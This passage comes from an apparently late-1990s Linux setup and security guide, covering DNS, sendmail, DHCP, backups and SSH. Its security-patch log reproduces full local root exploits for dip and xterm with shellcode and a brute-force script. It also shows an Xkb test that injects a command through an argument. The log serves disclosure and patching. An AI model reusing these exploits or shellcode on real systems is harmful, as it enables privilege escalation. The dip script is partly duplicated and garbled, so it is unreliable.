InterNIC Registration Archives ; file named.root ; ; last update: Feb 28, 1997 ; related version of root zone: 1997022800 ; ; ; formerly NS.INTERNIC.NET ; . 3600000 IN NS A.ROOT-SERVERS.NET. A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4 ; ; formerly NS1.ISI.EDU ; . 3600000 NS B.ROOT-SERVERS.NET. B.ROOT-SERVERS.NET. 3600000 A 128.9.0.107 ; ; formerly C.PSI.NET ; . 3600000 NS C.ROOT-SERVERS.NET. C.ROOT-SERVERS.NET. 3600000 A 192.33.4.12 ; ; formerly TERP.UMD.EDU ; . 3600000 NS D.ROOT-SERVERS.NET. D.ROOT-SERVERS.NET. 3600000 A 128.8.10.90 ; ; formerly NS.NASA.GOV ; . 3600000 NS E.ROOT-SERVERS.NET. E.ROOT-SERVERS.NET. 3600000 A 192.203.230.10 ; ; formerly NS.ISC.ORG ; . 3600000 NS F.ROOT-SERVERS.NET. F.ROOT-SERVERS.NET. 3600000 A 192.5.5.241 ; ; formerly NS.NIC.DDN.MIL ; . 3600000 NS G.ROOT-SERVERS.NET. G.ROOT-SERVERS.NET. 3600000 A 192.112.36.4 ; ; formerly AOS.ARL.ARMY.MIL ; . 3600000 NS H.ROOT-SERVERS.NET. H.ROOT-SERVERS.NET. 3600000 A 128.63.2.53 ; ; formerly NIC.NORDU.NET ; . 3600000 NS I.ROOT-SERVERS.NET. I.ROOT-SERVERS.NET. 3600000 A 192.36.148.17 ; ; temporarily housed at NSI (InterNIC) ; . 3600000 NS J.ROOT-SERVERS.NET. J.ROOT-SERVERS.NET. 3600000 A 198.41.0.10 ; ; temporarily housed at NSI (InterNIC) ; . 3600000 NS K.ROOT-SERVERS.NET. K.ROOT-SERVERS.NET. 3600000 A 198.41.0.11 ; ; temporarily housed at ISI (IANA) ; . 3600000 NS L.ROOT-SERVERS.NET. L.ROOT-SERVERS.NET. 3600000 A 198.32.64.12 ; ; temporarily housed at ISI (IANA) ; . 3600000 NS M.ROOT-SERVERS.NET. M.ROOT-SERVERS.NET. 3600000 A 198.32.65.12 ; End of File ------ - Edit/create "/var/named/trinity.db" file and make the following additions and changes: ----- ;SOA ;domain ttl ; trinity.value.net. IN SOA trinity.trinity.value.net. trinity.value.net. ( 97110301 ; serial # 3600 ; refresh 600 ; retry 634000 ; expire: 1 week 86400 ; ttl: 1 day ) trinity.value.net. IN NS trinity.trinity.value.net. ; trinity.trinity.value.net. IN A 192.168.0.1 stimpy2.trinity.value.net. IN A 192.168.0.2 ; dellster.trinity.value.net. IN A 192.168.0.4 ; ; ; ; spare.trinity.value.net. IN A 192.168.0.9 spare2.trinity.value.net. IN A 192.168.0.10 ; hub.trinity.value.net. IN A 192.168.0.250 ----- ================================================================================ Section 23 - Sendmail configuration Once you get mail running, you will notice that when you send mail from your machine, the receiver will see "ns.yourhost.com" in the reply field and NOT "yourhost.com". To fix this, you need to enable sendmail masquerade. You can do this the easy way or the harder way: Easy way: - edit /etc/sendmail.cf - Near line 164, you will see "DM" by itself. Add your domain to this line. ie DMtrinnet.net - Near lines 813 and 814, change the terse lines from this: #R$+ $@ $>93 $1 to this: R$+ $@ $>93 $1 and this R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2 to this: #R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2 Harder way: - The Sendmail CF example files and the M4 scripting language need to be installed. Redhaft5 users: Verify this by typing in "rpm -q sendmail-cf" - Goto /usr/lib/sendmail-cf/cf Redhat5: Edit the redhat.mc file and make it look as shows: ---- divert(-1) include(`../m4/cf.m4') divert(-1) include(`../m4/cf.m4') define(`confDEF_USER_ID',``8:12'') OSTYPE(`linux') undefine(`UUCP_RELAY') undefine(`BITNET_RELAY') MASQUERADE_AS(trinnet.net) FEATURE(masquerade_envelope) FEATURE(redirect) FEATURE(always_add_domain) FEATURE(use_cw_file) FEATURE(local_procmail) MAILER(procmail) MAILER(smtp) HACK(check_mail3,`hash -a@JUNK /etc/mail/deny') HACK(use_ip,`/etc/mail/ip_allow') HACK(use_names,`/etc/mail/name_allow') HACK(use_relayto,`/etc/mail/relay_allow') HACK(check_rcpt4) HACK(check_relay3) ---- - Next, edit or create /etc/sendmail.cw This file is very important to masquerade your domain properly. In this file, put in the name that is associated with your MX record. ---- # sendmail.cw - include all aliases for your machine here. ns.trinnet.net ---- - Now do the following: cp /etc/sendmail.cf /etc/sendmail.cf.orig export CFDIR="/usr/lib/sendmail-cf/cf" cd /usr/lib/sendmail-cf/cf" m4 ${CFDIR}/m4/cf.m4 redhat.mc > /etc/sendmail.cf /etc/rc.d/init.d/sendmail restart Thats it! Make sure to test it out though! ================================================================================ Section 24 - NTP Time calibration * Some of you might be wondering why I'm not using XNTP or simething like that. Why? Getdate is 37k with ALL the sources and compiled binaries. Ntp-4.0.72i is over 8.8MB! For fricken time! Yes, Xntp does a LOT more than getdate but for the purposes we need here, it is MASSIVE overkill. - Download Getdate and put it in /usr/src/archive - Uncompressit via "tar -xzvf - Edit the Makefile - Change the "PREFIX" to be /usr/local - Run "make", "make install", "make installman" - Now, goto http://www.eecis.udel.edu/~mills/ntp/clock1.html and pick a NTP server to connect to. Test that it is up by running "getdate your.ntp.site". [root@trinity2 /root]# getdate ntp.nasa.gov ntp.nasa.gov: (-68) Sun Jun 14 10:27:28 1998 * There are TWO examples here: once and hour and every 15 minutes. If you are running Diald, this traffic will bring up the link. So, if you want to have your machine come up EVERY 15 MINUTES.. this is the way to do it. - Slackware users: - Edit "/var/spool/cron/crontab/root" and add this line to the bootom of the file: - 15 minutes 0,15,30,45 * * * * /usr/local/bin/getdate -adjust 1 120 your.ntp.site - 60 minutes 0 * * * * /usr/local/bin/getdate -adjust 1 120 your.ntp.site - Redhat users - 15 minutes - Edit the /etc/crontab file and ADD this line ABOVE the cron.hourly line. 0,15,30,45 * * * * root run-parts /etc/cron.15min - Copy an example file from cron.daily dir to the cron.15min cp /etc/cron.daily/tmpwatch /etc/cron.15min/getdate ** Ps. If you missed it in Section 6, "tmpwatch" and thus "getdate" might not be root executable (bug). Fix this by doing: chmod +x /etc/cron.daily/tmpwatch chmod +x /etc/cron.15min/getdate - Edit the new /etc/cron.15min/getdate and make it look like so: /usr/local/bin/getdate -adjust 1 120 your.ntp.site - 60 minutes - Edit the /etc/crontab file and ADD this line ABOVE the cron.hourly line. 0 * * * * root run-parts /etc/cron.daily - Copy an example file from cron.daily cp /etc/cron.daily/tmpwatch /etc/cron.daily/getdate ** Ps. If you missed it in Section 6, "tmpwatch" and thus "getdate" might not be root executable (bug). Fix this by doing: chmod +x /etc/cron.daily/tmpwatch chmod +x /etc/cron.daily/getdate - Edit the new /etc/cron.daily/getdate and make it look like so: /usr/local/bin/getdate -adjust 1 120 your.ntp.site - Lastly, both 15 and 60 minute users need to tell CRON to re-read it's configuration file by running: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` ================================================================================ Section 25 - DHCPd configuration Note: This config statically defines an IP address per machine MAC address. I do this for security reasons. To find out the MAC address of a machine's ethernet card, do the following: Win95: run "winipcfg" - Redhat: - Make sure that the /etc/rc.d/rc3.d/S65dhcpd exists - Edit the file /etc/rc.d/init.d/dhcpd and change the following Start section line from: daemon dhcpd to route add -host 255.255.255.255 eth0 daemon dhcpd eth1 NOTE: you need to change the "interface" name to whatever INTERNAL LAN interface you want DHCP to run on. Ie. You DON'T want DHCP to run on your Internet connection!! - Slackware: Add the following line to the /etc/rc.d/rc.inet1 file: route add -host 255.255.255.255 eth0 Add a line to execute dhcpd in the /etc/rc.d/rc.local file like: /usr/sbin/dhcpd eth1 Create the file /etc/dhcpd.conf ---- server-identifier trinity2-int.trinnet.net; option subnet-mask 255.255.255.0; option broadcast-address 192.168.0.255; option routers 192.168.0.1; option domain-name-servers 192.168.0.1, 24.1.64.33, 24.1.64.34; option domain-name "trinnet.net"; default-lease-time 86400; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.9 192.168.0.10; } host dellster.trinnet.net { hardware ethernet 00:60:08:B1:36:4A; fixed-address 192.168.0.4; option host-name dellster; } ---- Section 26 - POP3 remote mail serivces If you have configured your IPFWADM rulesets correctly and have enabled "in.pop3d" in the /etc/inetd.conf file, Ie, un-# the POP3 line in the /etc/inetd.conf file and then run: kill -HUP `ps aux | grep inetd | grep -v -e grep | awk '{print $2}'` mail should work right out of the box. ================================================================================ Section 27 - Configuring BRU and backing up (it's not free if you don't go Redhat or Caldera but its the best Linux backup software out there. This is one place you just CAN'T skimp!) NOTE: I've noticed that the behavior of BRU between v14.3 and 15.0 (Bru2000) is quite different. Still works though!) Edit /etc/profile and add your appropriate time zone above the "export" command (this is for the Pacific time zone): TZ=PDT Next, find the line that starts with "export" and add "TZ" to the end of it. Here is my "export" line: export PATH PS1 HOSTNAME HISTSIZE HISTFILESIZE USER LOGNAME MAIL NNTPSERVER TZ Next, you need to setup BRU to understand your tape drive. Personally, I would recommend to use ESTINC's setups at: http://www.estinc.com/brutabs.html Or, startup Xwindows and run "bruconfig" and configure it this way. Now we need to setup an exclude file so you don't backup things like CD-ROM drives or compress ZIP files, etc. First, backup the original file by doing "mv /etc/bruxpat /etc/bruxpat.orig" and then create this file and edit it to fit your needs: --< /etc/bruxpat Start>-- # Updated 5/15/98 - dranch # # This file is used by -X option to provide an inclusion/exclusion # list. For each pathname of a file selected for backup, each line # of this file is examined for a pattern, and that pattern is applied # to the pathname. If the pattern matches, the appropriate action # is taken (the pathname is accepted or rejected). If the pathname # makes it through all the patterns it is accepted. # # These patterns will ONLY be applied to filenames that are part # of directories that are specified on the bru command line (or # the current directory, if none are specified). # # # Each command line in the bruxpat file (the file you are now reading) # consists of a control field and a pattern. The pattern # is separated from the control field by whitespace. Control field # characters are: # # i Include this pathname if pattern matches. The # pathname is accepted and no further patterns are # applied. # *** NOTE **** # It stops trying on the first pattern match found # and passes the filename. Since it scans patterns # in the order listed, "include" patterns normally # should be listed before any "exclude" patterns. # # x Exclude this pathname if pattern matches. The # pathname is rejected and no further patterns are # applied. # # z Exclude this pathname from compression if pattern # matches (if the -Z option is specified). # # s The pattern is a shell style wildcard pattern except # that '/' characters are not treated as special characters. # # r The pattern is a regular expression (same as used by the "grep" # command). # # l The pattern is a literal string. # # Exclude all core files xs */core xs core # Don't try to get the stuff in /proc xs /proc/* xs ./proc/* # Don't backup the CD-Rom xs /home/hpe/Cdrom1/* xs ./home/hpe/Cdrom1/* xs /home/hpe/Cdrom2/* xs ./home/hpe/Cdrom2/* # Exclude all files and subdirectories in the temporary directories. # Handle files specified with relative and absolute pathnames # # -- NOTE -- the actual directory names will still be backed up, # only the files within the directories will be # excluded. #xs ./usr/tmp/* #xs /usr/tmp/* #xs ./tmp/* #xs /tmp/* # Don't compress files that end in ".z" or ".Z" zs *.[Zz] zs *.zip zs *.ZIP zs *.arj zs *.ARJ zs *.[Aa][0-50] zs *.[0-50] zs *.gz zs *.GZ zs *.gzip zs *.GZIP zs *.bz2 zs *.BZ2 zs *.tgz zs *.TGZ zs *.tar.gz zs *.tar.bz2 zs *.rpm zs *.RPM --< /etc/bruxpat End>-- Create the file /usr/local/sbin/bru-fullbackup with the following in it. NOTE: You might want to change the label field to your tape drive and proper date --< /usr/local/sbin/bru-fullbackup start>-- #!/bin/sh clear # Edited 5/13/98 echo "Setting enviroment vars" export BUFSIZE=2048k export BRUTMPDIR=/tmp # Do not use -j, -m, echo "Starting BRU full backup with exclusions, compression, user intervention" bru -c -vvvv -V -X -Z -G -L "Conner Tr4 05/13/98 - FULL" -f /dev/st0 / > /var/log/bru-log # v1.28.98 # See /etc/bruhelp for A LOT of more details... # # Defaults to backing up "/" # # -c : create (autoscan verification on by default) # : - if you specify -i or -d, autoverify is disabled # # -d : file comparison (normal) # -dd : file comparison access mod, lenths, symlinks, ID groups # -dddd : file comparison - narly # # -e : Estimate archive size # # -f : select regular input device (same as -r) # # -g : Read : Dumps the header block # -gg : Read : Generates ted cmd line, label, date, time, release, # # -h : Print this help information # # -i : inspect a archive *checksum of a directory) # : Not needed with "-v" # # -r : Backup a raw partition # # -t : List archive table of contents for files # # -u - use selected files # a - all files # b - block special files # c - character (special files) # d - dirs # l - syms # p - fifos # r - reg # # -vvvv : Level 4 verbosity # # -w : confirmation of each file # # : wildcard expantion [must be placed in double quotes] # -x : restore # # -G : Write a archive list (header block) at beginning of # -L : Label the tape # -B : disabled user intervetion # -D : Enabled double buffering for faster throughput # -Z : compression # -V : execution summary w/o volume # -X : Exclude specific files # # bru -gg -f /dev/st0 : Display archive contents if written # #bru -vv -t -f /dev/st0 : Display entire contents of archive tape # #bru -x -vvvv /user/dranch/* # # Also, these enviroment variables are available in /etc/brutab # # Global BRU settings # #+OVERWRITEPROTECT=YES #+RECYCLEDAYS=180 #+MAXWRITES=200 #+ZBUFSIZE=512k #+SHELL=/bin/sh #+BRUTABONLY=no #+DEVNAMECHECK=no #+MATCHLEVEL=2 #+MAXFILENAMELEN=255 #+READCHECKLEVEL=1 #+BRUHELP=/bru/bruhelp #+BRUMAXWARNINGS=1000 #+BRUMAXERRORS=500 #+BRUXPAT=/etc/bruxpat #+BRURAW=/etc/bruraw #+BRUSMARTREST=/etc/brusmartrest #+BRUREMOVELOG=/var/adm/bruremovelog #+BRUTMPDIR=/tmp --< /usr/local/sbin/bru-fullbackup End.>-- Ok.. now, insert a tape in the tape drive and run "/usr/local/sbin/bru-fullbackup". I usually also run "tail -f /var/log/bru-log" in another TTY to watch the progress of the backup. ================================================================================ Section 28 - Full SSH telnet and X-windows encrypted tunnels - Goto ftp://ftp.cs.hut.fi/pub/ssh and download the newest SSH server available (this also is the Unix SSH client too) - If you want a awesome Windows SSH client, download the Secure-CRT telnet/SSH client from http://www.vandyke.com/ (not directly FTP'able due to an export-law form) - Un-tar the UNIX server/client by running "tar -xzf ssh-1.2.25.tar.gz" - Now run "./configure", "./make", "./make install" - Next, edit the /etc/rc.d/rc.local file and append the following: # echo "Starting sshd..." /usr/local/sbin/sshd - Load up the SSHd program for testing by entering in "./usr/local/sbin/sshd &" - Now, load up your SSH client (Secure-CRT used for this example) and do the following - File --> Quick Connect --> "Session list" tab --> New - Enter in the name of a SSH site to connect to - Change the protocol to "SSH" - Enter in the fully qualified domain name of the remote site - Verify the port is set to "22" - Enter in your username for the remote site - Change the Cipher to "3DES" - Change the authentication to "password" - Now click on "Keygen" - Click on Next - Skip setting up the "Passphrase" and just click on "Next" - Leave the encryption setting to "1024" and click on "Next" - Now you will need to move the mouse around to help simulate a random number generator to create your private/public key pairs. - Click on "Next" - Click on "Finished" - That's it. From S-CRT, go ahead and try connecting to your remote SSH server and you should be prompted with a dialog box asking to "Accept and save" the keypair. Click on "OK". Now you should be prompted to enter in your password and you should now login over an SSH tunnel! - To SSH from your Linux box, just run "ssh xyz" where "xyz" is the remote SSH-enabled server fully qualified domain name. ================================================================================ ################################################################################ --- These features have NOT been completed yet --- ################################################################################ ================================================================================ Section - Full APC SmartUPS powerdown support - Install "apcupsd" Instructions to be added shortly! ================================================================================ Section - Sound card utilities SoundBlaster 16 mixer WAV player/recorder ================================================================================ Section - Samba installation and configuration - Samba (stock in Redhat if installed) ================================================================================ Section - System optimization and tuning - Tuning: - IRQTune ftp://shell5.ba.best.com/pub/cae/irqtune.tgz - HDparm -u ================================================================================ Section - WWW Caching Proxy - WWW proxy (Apache or Squid) ================================================================================ Section - Transparent WWW Banner/Ad filtering - WWW Ad banner filtering http://www-math.uni-paderborn.de/~axel/NoShit/index.html patch: http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt ################################################################################ These features will NEVER be finished since UNIX is a moving target. If there is *ONE* section in TrinityOS to watch.. it's the BOTTOM of this doc (ie.. this next section!!!) Section 34 - Final Security and up-to-date Linux Security & patching ################################################################################ - IP logger ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/SRPMS/iplogger-0.1-1.src.rpm /etc/profile -- rm ~$LOGNAME/.bash_history -- - TripWire ftp://coast.cs.purdue.edu/pub/COAST/Tripwire - Verify all security exploits http://www.ecst.csuchico.edu/~jtmurphy/ http://www.users.interport.net/~reptile/linux/index.html chmod 1777 /usr/local/lib/bru (assuming root login) or My /usr/local/lib/bru directory is 775, works fine (as expected) from root. great Security URLS: ftp://ftp.win.tue.nl/pub/security sendmail: 8.8.6.1 KSR[T] Advisory #003 Date: Aug 05, 1997 ID #: lin-cron-003 Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3 Affected Program: updatedb / crontabs Syn Attack logs: http://www.whitefang.com/synlog.html IP filtering: ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt CRON exploit: ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz psaux: The Quick fix: chmod 660 /dev/psaux 2/9/98: Xkb 1. as usual chmod u-s,g-s all installed Xserver binaries (*) Quick vulnerability check: $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;' [exit X server] $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!' * remove setuid/setgid bit from all installed Xservers * use xdm or a safe setuid wrapper to start Xserver 2/9/98: Device Dos ls -l /dev/* | grep "r-- " chmod ;) 2/9/98: Upgrade to ld.so v1.9.5 or better.. 2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine version of pop3 server). Patch is against pine 3.96 diff -ru log_lnx.c.orig log_lnx.c --- log_lnx.c.orig Tue May 2 00:08:20 1995 +++ log_lnx.c Thu Feb 5 08:49:31 1998 @@ -55,7 +55,8 @@ /* allow case-independent match */ if (!pw) pw = getpwnam (lcase (strcpy (tmp,user))); /* no entry for this user or root */ - if (!(pw && pw->pw_uid)) return NIL; + if (!(pw)) return NIL; + if (!(pw->pw_uid)) return NIL; if(!(spw = getspnam (pw->pw_name))) return NIL; /* validate password */ if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL; 2/9/98 chmod 700 /dev/zero Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Xconfigurator issue (make it 700) Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Remove all old versions of /lib/libc.so.x 2/9/98 Upgrade linux-ld.so.x 4/6/98 Security (make root executable only): /tmp overwrite exploit /sbin/Liloconfig (already good perms) /sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed) /sbin/makebootdisk (fixed) /sbin/netconfig.tty and netconfig.color (fixed) - COPS http://www.cdrom.com/pub/linux/sunsite/system/security/cops_104.tgz - SATAN ftp://ftp.win.tue.nl/pub/security/satan.tar.Z - Solar buffer-overflow fixer ftp://ftp.huwig.de/pub/linux/mama/2.0/stack_noexec-symlink-security-fix.bz2 4/19/98: Here is a patch for the "Off by one IP header bug. Put the following into a file (ie: offbyone.patch) in /usr/src/linux and apply it by running "patch -p1 < offbyone.patch". ---- --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 +++ ip_fragment.c Thu Apr 16 12:29:02 1998 @@ -375,7 +375,7 @@ fp = qp->fragments; while(fp != NULL) { - if (fp->len < 0 || count+fp->len > skb->len) + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len) { NETDEBUG(printk("Invalid fragment list: Fragment over size.\n")); ip_free(qp); ---- Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf file, re-run "lilo", and reboot. 4/22/98: [linux-security] SECURITY: procps 1.2.7 fixes security hole 5/8/98: Dip and Xterm exploits: The following code causes a buffer overrun in dip-3.3.7o that comes with linux slakware version 3.4 and maybe others. It can give you root permission if dip file is owned by root and set-user-id bit is set. This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it. The code is too messy... but it works. Regards, zef ------------------------------ dipr.c ----------------------------- /* * dip-3.3.7o buffer overrun 07 May 1998 * * sintax: ./dipr * * * offset: try increments of 50 between 1500 and 3000 * * tested in linux with dip version 3.3.7o (slak 3.4). * * by zef and r00t @promisc.net * * http://www.promisc.net */ #include #include static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int jump,i,n; unsigned long xaddr; char *cmd[5], buf[4096]; char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; jump=atoi(argv[1]); for (i=0;i<68;i++) buf[i]=0x41; for (n=0,i=68;i<113;i++) buf[i]=code[n++]; xaddr=getesp()+jump; buf[i]=xaddr & 0xff; buf[i+1]=(xaddr >> 8) & 0xff; buf[i+2]=(xaddr >> 16) & 0xff; buf[i+3]=(xaddr >> 24) & 0xff; buf[i+4]=xaddr & 0xff; buf[i+5]=(xaddr >> 8) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+7]=(xaddr >> 24) & 0xff; cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o"); cmd[1]=malloc(3); strcpy(cmd[1],"-k"); cmd[2]=malloc(3); strcpy(cmd[2],"-l"); cmd[3]=buf; cmd[4]=NULL; execve(cmd[0],cmd,NULL); } ------------------------------- end ------------------------------- Shell script for easy testing :-) ---------------------------- dipr.test ---------------------------- #/bin/bash if [ ! -x /sbin/dip-3.3.7o ] then echo "could not find file \"/sbin/dip-3.3.7o\""; exit -1 fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] do echo offset=$x x=$[x+50] ./dipr $x done rm -f core ------------------------------- end ------------------------------- Approved-By: aleph1@NATIONWIDE.NET X-Sender: andrea@dragon.bogus X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc Date: Fri, 8 May 1998 16:50:05 +0200 Reply-To: Andrea Arcangeli Sender: Bugtraq List From: Andrea Arcangeli Subject: xterm exploit [TOG issue] To: BUGTRAQ@NETSPACE.ORG /* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include #include #include unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell(){ __asm__( "movb $0x56, %al\n\t" "l1:cmpb $0x12, %al\n\t" "je l2\n\t" "movb $0x12,%al\n\t" "call l1\n\t" "l2:pop %esi\n\t" "xorl %eax,%eax\n\t" "movb $0x25, %al\n\t" "addl %eax,%esi\n\t" "movl %esi,%ebx\n\t" "movl %esi,%edi\n\t" "movb $8,%al\n\t" "addl %eax,%edi\n\t" "movb $5,%al\n\t" "addl %eax,%esi\n\t" "movl %esi,(%edi)\n\t" "movl %edi,%ecx\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "xorb %al,%al\n\t" "movl %eax,(%edi)\n\t" "movl %edi,%edx\n\t" "movb $0xb,%al\n\t" "int $0x80\n\t" ".string \"/bin/sh\"\n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } I can' t reproduce the problem with the latest Debian compiled XFree86: andrea@dragon:~$ dpkg -l xbase Desired=Unknown/Install/Remove/Purge | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name Version Description +++-===============-==============-============================================ ii xbase 3.3.2-4 local clients and configuration required by Andrea[s] Arcangeli ---- 5/30/98 - I didn't mention these before but I guess I really should. All users should apply patches for the following problems ASAP. This is were Redhat RPMs, and Debian upgrade files really shine and blow away Slackware .PKG files! Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed so if it says the RPM is already installed, just skip it. Redhat users #2: If you try to install all the RPMs in a specific dir by typing in "rpm -uvh *", you might find that about 50% of the RPMs will install and then the RPM program will coredump. I don't know what causes this but just find the last RPM name that installed successfully, say something with the first letter of "q" and then run this: "rpm -Uvh [qQ-zZ].rpm" Ok? Not, to find out if any new RPM files exist for Redhat, goto http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs. Their documentation system read SUCKS in terms of though there might be a NEWER RPM for Glibc, they mearly update the DATE in the previous Gblic errata entry. Lame eh? So, you will have to page though the different errata listing to find what newer-date entries have been added. Here is the current RPM list as of May 28th, 1998. -rw-r--r-- 1 root root 50155 Apr 23 16:14 00README.errata.general -rw-r--r-- 1 root root 12807 May 6 21:44 00README.errata.intel-specific drwxr-xr-x 2 root root 1024 Apr 14 21:26 DEPENDANCIES drwxr-xr-x 2 root root 1024 May 30 23:31 NOT-NEEDED drwxr-xr-x 2 root root 1024 May 31 00:09 OLD drwxr-xr-x 2 root root 1024 May 30 23:31 Old -rw-r--r-- 1 root root 297 Dec 18 03:05 README.kernl -rw-r--r-- 1 root root 52313 Jan 22 01:04 Xconfigurator-3.26-1.i386.rpm -rw-r--r-- 1 root root 473290 Jan 17 00:53 amd-920824upl102-11.i386.rpm -rw-r--r-- 1 root root 406892 Jan 7 09:55 apache-1.2.5-1.i386.rpm -rw-r--r-- 1 root root 35815 Dec 6 04:49 autofs-0.3.14-2.i386.rpm -rw-r--r-- 1 root root 133907 Apr 2 04:40 bind-4.9.6-7.i386.rpm -rw-r--r-- 1 root root 146104 Apr 2 04:40 bind-utils-4.9.6-7.i386.rpm -rw-r--r-- 1 root root 61532 Jan 1 01:16 dump-0.3-11.i386.rpm -rw-r--r-- 1 root root 173348 Jan 8 03:30 elm-2.4.25-11.i386.rpm -rw-r--r-- 1 root root 89140 Mar 10 06:36 findutils-4.1-21.i386.rpm -rw-r--r-- 1 root root 3864063 May 11 23:25 glibc-2.0.7-13.i386.rpm -rw-r--r-- 1 root root 8236 Apr 2 04:40 glibc-debug-2.0.7-6.i386.rpm -rw-r--r-- 1 root root 2608055 May 11 23:25 glibc-devel-2.0.7-13.i386.rpm -rw-r--r-- 1 root root 1818742 May 11 16:25 glibc-profile-2.0.7-13.i386.rpm -rw-r--r-- 1 root root 672255 Dec 9 06:50 gtk-0.99.970925-3.i386.rpm -rw-r--r-- 1 root root 1727125 Dec 9 06:50 gtk-devel-0.99.970925-3.i386.rpm -rw-r--r-- 1 root root 60797 Jan 29 05:00 gzip-1.2.4-10.i386.rpm -rw-r--r-- 1 root root 766023 Dec 12 05:30 imap-4.1.BETA-9.i386.rpm -rw-r--r-- 1 root root 75202 Mar 21 07:01 info-3.12-1.i386.rpm -rw-r--r-- 1 root root 33373 Mar 10 22:22 initscripts-3.32-1.i386.rpm -rw-r--r-- 1 root root 178953 Dec 31 02:59 ircii-2.8.2-13.i386.rpm -rw-r--r-- 1 root root 181636 Dec 31 02:59 ircii-help-2.8.2-13.i386.rpm -rw-r--r-- 1 root root 109332 Dec 13 00:22 joe-2.8-10.i386.rpm -rw-r--r-- 1 root root 157369 Dec 10 09:22 kaffe-0.9.2-3.i386.rpm -rw-r--r-- 1 root root 228211 Dec 10 09:22 kaffe-bissawt-0.9.2-3.i386.rpm -rw-r--r-- 1 root root 461808 Mar 26 00:32 kbd-0.94-6.i386.rpm -rw-r--r-- 1 root root 67794 Nov 27 1997 ld.so-1.9.5-5.i386.rpm -rw-r--r-- 1 root root 1984591 Dec 25 03:56 libc-5.3.12-25.i386.rpm -rw-r--r-- 1 root root 70068 Apr 23 22:36 lpr-0.31-1.i386.rpm -rw-r--r-- 1 root root 722723 Apr 2 04:41 lynx-2.8-1.i386.rpm -rw-r--r-- 1 root root 1156113 Mar 22 04:54 mh-6.8.4-6.i386.rpm -rw-r--r-- 1 root root 5854 Mar 24 23:44 mkinitrd-1.8-1.i386.rpm -rw-r--r-- 1 root root 28709 Dec 9 06:50 mouseconfig-2.22-1.i386.rpm -rw-r--r-- 1 root root 77534 Mar 21 04:39 ncftp-2.4.3-1.i386.rpm -rw-r--r-- 1 root root 525312 Dec 31 23:16 ncurses-1.9.9e-8.i386.rpm -rw-r--r-- 1 root root 6007864 Jan 24 06:20 netscape-navigator-4.04-3.i386.rpm -rw-r--r-- 1 root root 263775 Nov 27 1997 pcmcia-cs-2.9.12-2.i386.rpm -rw-r--r-- 1 root root 3260216 